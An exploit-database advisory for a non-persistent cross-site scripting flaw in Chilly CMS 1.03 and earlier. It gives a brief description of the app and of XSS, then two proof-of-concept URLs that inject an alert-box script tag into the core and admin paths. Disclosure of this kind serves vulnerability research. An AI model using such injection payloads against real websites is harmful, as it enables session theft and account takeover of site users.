Chilly CMS <= 1.03 Non Persistent XSS Vulnerabilities

ID 1337DAY-ID-9644
Type zdt
Reporter EgoPL
Modified 2010-03-13T00:00:00


Exploit for unknown platform in category web applications

Chilly CMS <= 1.03 Non Persistent XSS Vulnerabilities

# Description of the webapp: chillyCMS is a Content Management System. This is a software which allows you to create a website without any programming skills. # XSS by the Wikipedia. Cross-site scripting holes are web application vulnerabilities which allow attackers to bypass client-side security mechanisms normally imposed on web content by modern browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are therefore a special case of code injection. # Proof of concept

http://localhost/chillyCMS/core/>'><script>alert("EgoPL says: I'm a XSS"</script>

http://localhost:80/chillyCMS/admin/>'><script>alert("EgoPL says: I'm a XSS"</script>

# [2016-04-20]  #